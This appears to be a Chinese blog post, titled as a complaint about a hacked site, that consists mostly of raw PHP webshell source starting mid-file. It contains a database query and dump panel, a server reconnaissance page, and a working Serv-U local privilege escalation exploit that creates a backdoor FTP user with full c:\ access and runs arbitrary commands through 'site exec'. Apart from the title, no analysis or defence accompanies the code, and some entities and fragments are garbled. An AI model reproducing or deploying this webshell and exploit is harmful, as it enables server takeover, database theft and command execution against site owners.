php8木马误报,我网站被挂木马了悲剧“超级带(批量挂马)PHP木马”

于 2021-03-10 10:12:56 发布
阅读量305 收藏
点赞数
文章标签: php8木马误报

$tb->tableheader();

$tb->formheader($action,'执行 SQL 语句');

$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));

$tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));

$tb->makehidden('do','query');

$tb->formfooter('1','30');

}//end sql query

elseif ($_GET['action'] == "sqlbak") {

$action = '?action=sqlbak';

$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';

$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';

$dbpassword = $_POST['dbpassword'];

$dbname = $_POST['dbname'];

$tb->tableheader();

$tb->formheader($action,'备份 MySQL 数据库');

$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));

@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);

$tables = @mysql_list_tables($dbname);

while ($table = @mysql_fetch_row($tables)) {

$cachetables[$table[0]] = $table[0];

}

@mysql_free_result($tables);

if (empty($cachetables)) {

$tb->tdbody('您没有连接数据库 or 当前数据库没有任何数据表');

} else {

$tb->tdbody('

请选择表:'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'
备份数据所保存的路径:'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'
直接下载到本地 (适合数据量较小的数据库)
');

$tb->makehidden('do','backupmysql');

$tb->formfooter('0','30');

}

$tb->tablefooter();

@mysql_close();

}//end sql backup

elseif ($_GET['action'] == "phpenv") {

$user = " 以免crush点此获取当前进程用户名 ";

$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";

$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from")."";

if ($dis_func == "") {

$dis_func = "No";

}else {

$dis_func = str_replace(" ","
",$dis_func);

$dis_func = str_replace(",","
",$dis_func);

}

$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";

$info = array(

0 => array("当前php进程用户",$user),

1 => array("服务器操作系统",PHP_OS),

2 => array("服务器时间",date("Y年m月d日 h:i:s",time())),

3 => array("服务器域名","".$_SERVER['SERVER_NAME'].""),

4 => array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),

5 => array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),

6 => array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),

7 => array("Web服务端口",$_SERVER['SERVER_PORT']),

8 => array(&quot

5ed169d678b20a33521cc07406290239.gifHP运行方式",strtoupper(php_sapi_name())),

9 => array(&quot

5ed169d678b20a33521cc07406290239.gifHP版本",PHP_VERSION),

10 => array("运行于安全模式",getphpcfg("safemode")),

11 => array("服务器管理员",$adminmail),

12 => array("本文件路径",__FILE__),

13 => array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen")),

14 => array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl")),

15 => array("显示错误信息 display_errors",getphpcfg("display_errors")),

16 => array("自动定义全局变量 register_globals",getphpcfg("register_globals")),

17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),

18 => array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")),

19 => array(&quot

5ed169d678b20a33521cc07406290239.gifOST最大字节数 post_max_size",getphpcfg("post_max_size")),

20 => array("允许最大上传文件 upload_max_filesize",$upsize),

21 => array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒"),

22 => array("被禁用的函数 disable_functions",$dis_func),

23 => array("phpinfo()",$phpinfo),

24 => array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),

25 => array("图形处理 GD Library",getfun("imageline")),

26 => array("IMAP电子邮件系统",getfun("imap_close")),

27 => array("MySQL数据库",getfun("mysql_close")),

28 => array("SyBase数据库",getfun("sybase_close")),

29 => array("Oracle数据库",getfun("ora_close")),

30 => array("Oracle 8 数据库",getfun("OCILogOff")),

31 => array("PREL相容语法 PCRE",getfun("preg_match")),

32 => array("PDF文档支持",getfun("pdf_close")),

33 => array("Postgre SQL数据库",getfun("pg_close")),

34 => array("SNMP网络管理协议",getfun("snmpget")),

35 => array("压缩文件支持(Zlib)",getfun("gzclose")),

36 => array("XML解析",getfun("xml_set_object")),

37 => array("FTP",getfun("ftp_login")),

38 => array("ODBC数据库连接",getfun("odbc_close")),

39 => array("Session支持",getfun("session_start")),

40 => array("Socket支持",getfun("fsockopen")),

);

$tb->tableheader();

echo "

\n";

$tb->tdbody('查看PHP配置参数状况','left','1','30','style="padding-left: 5px;"');

$tb->tdbody('请输入配置参数(如:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','查看','','submit'),'left','2','30','style="padding-left: 5px;"');

$tb->makehidden('do','viewphpvar');

echo "

\n";

$hp = array(0=> '服务器特性', 1=> 'PHP基本特性', 2=> '组件支持状况');

for ($a=0;$a<3;$a++) {

$tb->tdbody(''.$hp[1].'','left','1','30','style="padding-left: 5px;"');

?>

if ($a==0) {

for($i=0;$i<=12;$i++) {

echo "

".$info[$i][0]."".$info[$i][1]."\n";

}

} elseif ($a == 1) {

for ($i=13;$i<=24;$i++) {

echo "

".$info[$i][0]."".$info[$i][1]."\n";

}

} elseif ($a == 2) {

for ($i=25;$i<=40;$i++) {

echo "

".$info[$i][0]."".$info[$i][1]."\n";

}

}

?>

}//for

echo "";

}//end phpenv

elseif($_GET['action'] == "SUExp")

{

if($_POST['SUPort'] != "" && $_POST['SUUser'] != "" && $_POST['SUPass'] != "" && $_POST['SUCommand'])

{

echo "

";

$sendbuf = "";

$recvbuf = "";

$domain  = "-SETDOMAIN\r\n".

"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".

"-TZOEnable=0\r\n".

" TZOKey=\r\n";

$adduser = "-SETUSERSETUP\r\n".

"-IP=0.0.0.0\r\n".

"-PortNo=2121\r\n".

"-User=Will_Be\r\n".

"-Password=Will_Be\r\n".

"-HomeDir=c:\\\r\n".

"-LoginMesFile=\r\n".

"-Disable=0\r\n".

"-RelPaths=1\r\n".

"-NeedSecure=0\r\n".

"-HideHidden=0\r\n".

"-AlwaysAllowLogin=0\r\n".

"-ChangePassword=0\r\n".

"-QuotaEnable=0\r\n".

"-MaxUsersLoginPerIP=-1\r\n".

"-SpeedLimitUp=0\r\n".

"-SpeedLimitDown=0\r\n".

"-MaxNrUsers=-1\r\n".

"-IdleTimeOut=600\r\n".

"-SessionTimeOut=-1\r\n".

"-Expire=0\r\n".

"-RatioUp=1\r\n".

"-RatioDown=1\r\n".

"-RatiosCredit=0\r\n".

"-QuotaCurrent=0\r\n".

"-QuotaMaximum=0\r\n".

"-Maintenance=None\r\n".

"-PasswordType=Regular\r\n".

"-Ratios=None\r\n".

" Access=c:\\|RELP\r\n";

$deldomain="-DELETEDOMAIN\r\n".

"-IP=0.0.0.0\r\n".

" PortNo=2121\r\n";

$sock = fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10);

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "USER ".$_POST["SUUser"]."\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "SITE MAINTENANCE\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = $domain;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = $adduser;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

echo "**********************************************************
";

echo "Starting Exploit ...
";

echo "**********************************************************
";

$exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "USER Will_Be\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "PASS Will_Be\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: site exec ".$_POST["SUCommand"]."
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

echo "**********************************************************
";

echo "Starting Delete Domain ...
";

echo "**********************************************************
";

$sendbuf = $deldomain;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

echo "

";

fclose($sock);

fclose($exp);

}

?>

通过Serv-U 本地管理员帐号执行命令
LocalPort:

LocalUser:

        LocalPass:

Command :

}

?>

超级PHP木马带批量挂马.<?php

debuginfo();

ob_end_flush();

?>

再来一碗饭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值